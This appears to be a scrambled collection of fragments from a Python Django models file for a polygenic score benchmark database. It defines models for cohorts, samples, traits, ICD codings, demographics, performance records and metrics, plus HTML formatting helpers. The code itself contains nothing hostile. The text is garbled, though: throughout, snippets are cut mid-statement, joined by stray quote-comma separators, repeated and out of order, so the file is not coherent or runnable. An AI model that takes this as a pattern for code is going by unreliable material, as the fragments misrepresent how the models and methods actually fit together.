[mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') #", "describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short Name', max_length=100, db_index=True) name_full", "'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split('", "def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to", "return None def format_range(self): if self.estimate == None and self.range != None: return", "def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>:", "if len(category_labels) > 0 else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data =", "[] #@property #def category_list(self): # return sorted(self.traitcategory.all(), key=lambda y: y.label) #@property #def category_labels_list(self):", "models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description", "(se) def format_estimate(self): if self.estimate != None: return '{}:{}'.format(self.estimate_type, self.estimate) return None def", "estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate +=", "= {} for type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "verbose_name='Codings', related_name='coding_trait') def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self):", "self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return 
'{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def", "self.sample_cases != None: percent = (self.sample_cases / self.sample_number) * 100 return round(percent,2) else:", "def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def", "self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None:", "None: l['unit'] = self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence", "y: y.label) #@property #def category_labels_list(self): # categories = self.category_list # if len(categories) >", "0: # categories_data = ', '.join(category_labels) # return categories_data #@property #def display_category_labels(self): #", "ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True) ##", "def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s", "= models.FloatField(verbose_name='Variability (value)', null=True) variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. 
standard", "if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property", "= str(self.range) # Variability if self.variability != None: l[self.variability_type] = self.variability # Unit", "db_index=True) type = models.CharField('Code Type', max_length=10) class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in", "['scores', 'cohorts', 'samples', 'ancestries'] data = {} for type in data_types: data[type] =", "'Confidence interval', 'iqr': 'Interquartile range' } if self.range_type.lower() in desc_list: return desc_list[self.range_type.lower()] def", "metric data\"\"\" # Using all and filter afterward uses less SQL queries than", "= models.CharField('Source PubMed ID (PMID) or doi', max_length=100, null=True) cohort = models.ForeignKey(BM_Cohort, verbose_name='Cohort',", "+= '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self): if", "return [x.label for x in categories] # else: # return [] #@property #def", "return '{} ({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a", "#@property #def display_category_labels(self): # categories = self.category_list # categories_data = '' # if", "models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad = 
models.CharField('Broad", "in desc_list: return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd", "= self.unit return l def range_type_desc(self): desc_list = { 'ci': 'Confidence interval', 'iqr':", "= '{} : {} {}' # Estimate e = '' if self.estimate !=", "[mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years') # e.g. [years, months, days]", "self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts']", "self.url) @property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in", "value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS", "data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance))", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def count_samples(self): if", "estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range if self.range !=", "= self.performance_metric.all() if metrics: l = [] for m in metrics: if (m.type", "othermetrics_list = self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels':", "BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a set of", "# e.g. 
standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate !=", "models.CharField(verbose_name='Performance Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False)", "models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description', null=True) phenotype_structured =", "fields (sample_age, followup_time) that can be point estimates or distributions\"\"\" estimate = models.FloatField(verbose_name='Estimate", "BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data()", "'bm_data'): self.get_bm_data() #scores = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores'])", "data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self):", "self.range != None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range),", "performance = models.ForeignKey(BM_Performance, on_delete=models.CASCADE, verbose_name='PGS Performance Metric (PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES',", "#url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms',", "None: l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] = self.unit", "'</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property 
def display_ancestry(self): if self.ancestry_free", "None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return", "in ['NR', '', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self):", "and self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if", "for x in categories] # else: # return [] #@property #def category_list(self): #", "#cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) #return len(list(cohorts)) @property def", "models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait,", "def effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def", "v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit) else: v = no_helptip.format(self.variability_type.title(), self.variability, self.unit) if", "return desc_list[self.range_type.lower()] def variability_type_desc(self): desc_list = { 'sd': 'Standard Deviation', 'sd (cases)': 'Standard", "self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label) return data def get_bm_data(self): self.bm_data = {} data_types = ['scores',", "'<li><span class=\"only_export\">, </span>' sstring += '{:,} controls</li>'.format(self.sample_controls) sstring += '</ul>' sstring += '<span", "Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model): \"\"\"Class to describe", "Metric Name (Short)', max_length=25, null=True) # ex: \"OR\" 
estimate = models.FloatField(verbose_name='Estimate', null=False) unit", "display_ancestry_inline(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else: return '{} ({})'.format(self.ancestry_broad,", "'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age", "models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured", "primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True) type = models.CharField('Code Type', max_length=10) class", "__str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id,", "!= None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring +=", "= no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if (len(l) == 1):", "#for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # scores.add(bm_performance.score_id) return len(self.bm_data['scores']) @property def count_cohorts(self): if not", "effect_sizes_list(self): return self.get_metric_data('Effect Size') @property def class_acc_list(self): return self.get_metric_data('Classification Metric') @property def othermetrics_list(self):", "null=True) ancestry_country = models.TextField('Country of Recruitment', null=True) ancestry_additional = models.TextField('Additional Ancestry Description', null=True)", "phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_sample') followup_time = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='followuptime_of', null=True) ## Ancestry ancestry_broad", "self.range_type_desc() if 
(type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(),", "type in data_types: data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in", "models.CharField('Broad Ancestry Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. French, Chinese)', null=True) ancestry_country =", "self.effect_sizes_list effect_sizes_data = [] if effect_sizes_list: for effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value':", "self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'): self.get_bm_data() #scores =", "directly on the queryset metrics = self.performance_metric.all() if metrics: l = [] for", "= models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True)", "l[self.estimate_type] = estimate # Range if self.range != None and '[' not in", "'{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) return s def name_tuple(self): if self.name_short", "' {}'.format(self.unit) if len(e) > 0: l.append(e) # Variability v = None if", "({})'.format(self.ancestry_broad, self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and", "self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') #", "self.range != None: return '{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability !=", "{} # Estimate estimate = '' if self.estimate != None: estimate = str(self.estimate)", "v = None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc): v", "== 1): return l[0] elif (len(l) > 1): return 
'<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return ''", "display_category_labels(self): # categories = self.category_list # categories_data = '' # if len(categories) >", "self.ancestry_free) class BM_Performance(models.Model): \"\"\"Class to hold performance/accuracy metrics for a PGS and a", "return sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad", "return categories_data class BM_Demographic(models.Model): \"\"\"Class to describe Sample fields (sample_age, followup_time) that can", "'bm_data'): self.get_bm_data() return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "def get_bm_data(self): self.bm_data = {} data_types = ['scores', 'cohorts', 'samples', 'ancestries'] data =", "else '' # category_labels.append('<div{}><span class=\"trait_colour\" style=\"background-color:{}\"></span>{}</div>'.format(v_spacing,category.colour,category.label)) # categories_data = ''.join(category_labels) # return categories_data", "max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard", "category_labels = self.category_labels_list # categories_data = '' # if len(category_labels) > 0: #", "class=\"only_export\">[</span>' sstring += '<ul>\\n<li>{:,} cases{}</li>\\n'.format(self.sample_cases, percent_cases) if self.sample_controls != None: sstring += '<li><span", "class BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\"", "estimate # Range if self.range != None and '[' not in estimate: l[self.range_type]", "v != None: l.append(v) # Range r = None if '[' not in", "self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): # cohorts.add(bm_performance.cohort.id) 
#return", "data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property", "display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases", "= models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self):", "None: type_desc = self.range_type_desc() if (type_desc): r = helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else:", "{ 'sd': 'Standard Deviation', 'sd (cases)': 'Standard Deviation', 'se': 'Standard Error', } if", "self.range != None and self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type]", "hold performance/accuracy metrics for a PGS and a set of samples\"\"\" # Links", "= models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. 
standard deviation (sd), standard error (se)", "def count_cohorts(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for", "= '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring += '<div><a class=\"toggle_table_btn pgs_helptip\"", "self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r != None: l.append(r) if", "Metric') @property def othermetrics_list(self): return self.get_metric_data('Other Metric') @property def performance_metrics(self): perf_metrics = {}", "(PPM)', related_name=\"performance_metric\") TYPE_CHOICES = [ ('ES', 'Effect Size'), ('CM', 'Classification Metric'), ('OM', 'Other", "(cases)': 'Standard Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()]", "show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases =", "a set of samples\"\"\" # Links to related objects score_id = models.CharField('Polygenic Score", "return len(self.bm_data['samples']) @property def cohorts_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property", "for a PGS and a set of samples\"\"\" # Links to related objects", "information SAMPLE_SEX_CHOICES = [ ('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex =", "@property def display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all():", "metrics: l = [] for m in metrics: if (m.type == metric_type): l.append((m.name_tuple(),", "hasattr(self, 'bm_data'): self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): #", "'<ul><li>'+'</li><li>'.join(l)+'</li></ul>' else: return '' def 
display_values_dict(self): l = {} # Estimate estimate =", "(self.name_short): return '%s (%s): %s'%(self.name, self.name_short, s) else: return '%s: %s'%(self.name, s) def", "data_types: #print(type+\": \"+str(list(data_count[type]))) self.bm_data[type] = list(data[type]) @property def count_scores(self): if not hasattr(self, 'bm_data'):", "= models.ForeignKey(BM_Cohort, verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_performance') def __str__(self): return '%s | %s | %s'%(self.efotrait.id,", "self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return [] #@property #def", "othermetrics[0], 'value': othermetrics[1]}) perf_metrics['othermetrics'] = othermetrics_data return perf_metrics def get_metric_data(self, metric_type): \"\"\" Generic", "return None def display_samples_for_table(self, show_percent_cases=False): div_id = \"sample_\"+str(self.pk) sstring = '' if self.sample_cases", "set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id)", "bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id) data['cohorts'].add(bm_performance.cohort) data['samples'].add(bm_performance.sample.id) data['ancestries'].add(bm_performance.sample.ancestry_broad) for type in data_types: #print(type+\":", "Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance Metric Name", "self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if", "None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return", "'<span class=\"only_export\">]</span>' sstring += '</div>' 
else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property", "to a single score)\"\"\" id = models.CharField('Ontology Trait ID', max_length=30, primary_key=True) label =", "type, name, value and confidence intervals of a performance metric\"\"\" performance = models.ForeignKey(BM_Performance,", "sstring @property def display_ancestry(self): if self.ancestry_free in ['NR', '', None]: return self.ancestry_broad else:", "('Both', 'Both'), ('Male', 'Male'), ('Female', 'Female') ] sample_sex = models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample", "+= '</ul>' sstring += '<span class=\"only_export\">]</span>' sstring += '</div>' else: sstring += '{:,}", "self.variability, self.unit) if v != None: l.append(v) # Range r = None if", "(type)', max_length=100, null=True, default='mean') #e.g. [mean, median] unit = models.TextField(verbose_name='Unit', max_length=100, null=False, default='years')", "categories: # v_spacing = ' class=\"mt-1\"' if len(category_labels) > 0 else '' #", "max_length=30, db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for", "on the queryset metrics = self.performance_metric.all() if metrics: l = [] for m", "!= None: type_desc = self.variability_type_desc() if (type_desc): v = helptip.format(type_desc, self.variability_type.title(), self.variability, self.unit)", "#@property #def mapped_terms_list(self): # if self.mapped_terms: # return self.mapped_terms.split(' | ') # else:", "effect_size in self.effect_sizes_list: effect_sizes_data.append({'labels': effect_size[0], 'value': effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list", "else: # return [] #@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data", "return '<a href=\"../../benchmark/%s\">%s</a>'%(self.id, self.label) 
#@property #def display_id_url(self): # return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url,", "= \"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases = '' if", "False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True) se = models.FloatField(verbose_name='Standard error of the", "in categories] # else: # return [] #@property #def category_list(self): # return sorted(self.traitcategory.all(),", "on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk))", "= models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation efotrait =", "in variant associations and PGS training/testing\"\"\" # Sample Information ## Numbers sample_number =", "class BM_Coding(models.Model): \"\"\"Class to describe the International Classification of Diseases used in PGS", "all and filter afterward uses less SQL queries than filtering directly on the", ") sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free = models.TextField('Detailed Phenotype Description',", "None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free in", "s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return (self.name,", "max_length=1000) def __str__(self): return self.name_short class BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related", "/ self.sample_number) * 100 return round(percent,2) else: return None def display_samples_for_table(self, show_percent_cases=False): div_id", "None and self.range_type.lower() == 'ci': estimate += 
str(self.range) if estimate: l[self.estimate_type] = estimate", "SQL queries than filtering directly on the queryset metrics = self.performance_metric.all() if metrics:", "ID', max_length=30, primary_key=True) label = models.CharField('Ontology Trait Label', max_length=500, db_index=True) description = models.TextField('Ontology", "#mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings', related_name='coding_trait') def __str__(self): return", "'{}:{}'.format(self.range_type, str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability)", "trait vocabulary (mainly to link multiple EFO to a single score)\"\"\" id =", "Variability v = None if self.variability != None: type_desc = self.variability_type_desc() if (type_desc):", "Size'), ('CM', 'Classification Metric'), ('OM', 'Other Metric') ] type = models.CharField(max_length=40, choices=TYPE_CHOICES, default='Other", "__str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else: s =", "display_phenotype_structured(self): data = [] phenotype_structured = self.phenotype_structured.all() for phenotype in self.phenotype_structured.all(): data.append('<b>'+phenotype.id+'</b>: '+phenotype.label)", "@property def performance_metrics(self): perf_metrics = {} effect_sizes_list = self.effect_sizes_list effect_sizes_data = [] if", "self.range_type.lower() == 'ci': estimate += str(self.range) if estimate: l[self.estimate_type] = estimate # Range", "choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free", "Category', max_length=100) ancestry_free = models.TextField('Ancestry (e.g. 
French, Chinese)', null=True) ancestry_country = models.TextField('Country of", "#def display_category_labels(self): # categories = self.category_list # categories_data = '' # if len(categories)", "= helptip.format(type_desc, self.range_type.title(), str(self.range), self.unit) else: r = no_helptip.format(self.range_type.title(), str(self.range), self.unit) if r", "= '' if self.estimate != None: e += '{} : {}'.format(self.estimate_type.title(), self.estimate) if", "BM_Sample(models.Model): \"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\" #", "sstring += '</div>' else: sstring += '{:,} individuals'.format(self.sample_number) return sstring @property def display_ancestry(self):", "'', None]: return self.ancestry_broad else: return '{}<br/>({})'.format(self.ancestry_broad, self.ancestry_free) @property def display_ancestry_inline(self): if self.ancestry_free", "\"\"\"Class to describe samples used in variant associations and PGS training/testing\"\"\" # Sample", "Samples used for evaluation efotrait = models.ForeignKey(BM_EFOTrait, on_delete=models.PROTECT, verbose_name='EFO Trait', related_name=\"efotrait_performance\") cohort =", "default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ## Description phenotyping_free =", "#synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured = models.ManyToManyField(BM_Coding, verbose_name='Codings',", "'' def display_values_dict(self): l = {} # Estimate estimate = '' if self.estimate", "= self.othermetrics_list othermetrics_data = [] if othermetrics_list: for othermetrics in othermetrics_list: othermetrics_data.append({'labels': othermetrics[0],", "return '<a href=\"%s\">%s</a><span class=\"only_export\">: %s</span>'%(self.url, self.id, self.url) @property def display_phenotype_structured(self): data = []", "= 
models.CharField(max_length=6, choices=SAMPLE_SEX_CHOICES, default='Both', verbose_name='Sample Sex' ) sample_age = models.OneToOneField(BM_Demographic, on_delete=models.CASCADE,related_name='ages_of', null=True) ##", "Sample/Cohort Information', null=True) def __str__(self): return 'Sample: {}'.format(str(self.pk)) @property def sample_cases_percent(self): if self.sample_cases", "class_acc_data = [] if class_acc_list: for class_acc in self.class_acc_list: class_acc_data.append({'labels': class_acc[0], 'value': class_acc[1]})", "if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): # if self.synonyms:", "str(self.range)) return None def format_variability(self): if self.variability != None: return '{}:{}'.format(self.variability_type, self.variability) return", "null=True) def __str__(self): if self.ci != None: s = '{} {}'.format(self.estimate, self.ci) else:", "return s def name_tuple(self): if self.name_short is None: return (self.name, self.name) else: return", "verbose_name='Cohort', on_delete=models.PROTECT, related_name='cohort_sample') #cohorts_additional = models.TextField('Additional Sample/Cohort Information', null=True) def __str__(self): return 'Sample:", "in categories] # else: # return [] #@property #def category_labels(self): # category_labels =", "Catalog Study ID (GCST...)', max_length=20, null=True) #source_PMID = models.CharField('Source PubMed ID (PMID) or", "data[type] = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'): for bm_performance in self.efotrait_performance.all(): #print(str(bm_performance)) data['scores'].add(bm_performance.score_id)", "'{} : {}'.format(self.estimate_type.title(), self.estimate) if self.range != None and self.range_type.lower() == 'ci': e", "None: estimate = str(self.estimate) if self.range != None and self.range_type.lower() == 'ci': estimate", "not hasattr(self, 'bm_data'): 
self.get_bm_data() return len(self.bm_data['cohorts']) #cohorts = set() #for bm_performance in BM_Performance.objects.using(\"benchmark\").filter(efotrait=self).order_by('id'):", "self.sample_cases != None: percent_cases = '' if show_percent_cases: percent_cases = f' ({self.sample_cases_percent}%)' sstring", "\"sample_\"+str(self.pk) sstring = '' if self.sample_cases != None: percent_cases = '' if show_percent_cases:", "[x.label for x in categories] # else: # return [] #@property #def category_list(self):", "class BM_Cohort(models.Model): \"\"\"Class to describe cohorts used in samples\"\"\" name_short = models.CharField('Cohort Short", "if self.mapped_terms: # return self.mapped_terms.split(' | ') # else: # return [] #@property", "BM_EFOTrait(models.Model): \"\"\"Abstract class to hold information related to controlled trait vocabulary (mainly to", "self.category_list # categories_data = '' # if len(categories) > 0: # category_labels =", "s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short): return '%s", "the effect size', max_length=100, blank = False) ci = DecimalRangeField(verbose_name='95% Confidence Interval', null=True)", "models.CharField(verbose_name='Range (type)', max_length=100, default='range') # e.g. 
Confidence interval (ci), range, interquartile range (iqr),", "!= None: s = '{} {}'.format(self.estimate, self.ci) else: s = '{}'.format(self.estimate) if (self.name_short):", "db_index=True) sample = models.ForeignKey(BM_Sample, on_delete=models.PROTECT, verbose_name='PGS Sample', related_name='sample_performance') # Samples used for evaluation", "def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return self.bm_data['ancestries'] #@property #def synonyms_list(self): #", "x in categories] # else: # return [] #@property #def category_list(self): # return", "l[self.variability_type] = self.variability # Unit if self.unit != None: l['unit'] = self.unit return", "len(l) != 0: return l return None class BM_Metric(models.Model): \"\"\"Class to hold metric", "ex: \"OR\" estimate = models.FloatField(verbose_name='Estimate', null=False) unit = models.TextField(verbose_name='Units of the effect size',", "standard deviation (sd), standard error (se) def format_estimate(self): if self.estimate != None: return", "def __str__(self): return '%s | %s '%(self.id, self.label) @property def display_label(self): return '<a", "Deviation', 'se': 'Standard Error', } if self.variability_type.lower() in desc_list: return desc_list[self.variability_type.lower()] class BM_Sample(models.Model):", "self.range_type.lower() == 'ci': e += ' {}'.format(str(self.range)) e += ' {}'.format(self.unit) if len(e)", "= models.CharField(verbose_name='Performance Metric Name', max_length=100, null=False) # ex: \"Odds Ratio\" name_short = models.CharField(verbose_name='Performance", "#@property #def category_labels(self): # category_labels = self.category_labels_list # categories_data = '' # if", "Trait Description', null=True) #url = models.CharField('Ontology URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms", "effect_size[1]}) perf_metrics['effect_sizes'] = effect_sizes_data class_acc_list = self.class_acc_list class_acc_data = [] if 
class_acc_list: for", "self.unit) if v != None: l.append(v) # Range r = None if '['", "'bm_data'): self.get_bm_data() return self.bm_data['cohorts'] @property def ancestries_list(self): if not hasattr(self, 'bm_data'): self.get_bm_data() return", "URL', max_length=500) #synonyms = models.TextField('Synonyms', null=True) #mapped_terms = models.TextField('Mapped terms', null=True) phenotype_structured =", "self.name_short, s) else: return '%s: %s'%(self.name, s) def display_value(self): if self.ci != None:", "to hold performance/accuracy metrics for a PGS and a set of samples\"\"\" #", "\"\"\" id = models.CharField('Code ID', max_length=30, primary_key=True) label = models.CharField('Code Label', max_length=500, db_index=True)", "synonyms_list(self): # if self.synonyms: # return self.synonyms.split(' | ') # else: # return", "variability_type = models.CharField(verbose_name='Range (type)', max_length=100, default='se') # e.g. standard deviation (sd), standard error", "models.CharField(verbose_name='Estimate (type)', max_length=100, null=True, default='mean') #e.g. 
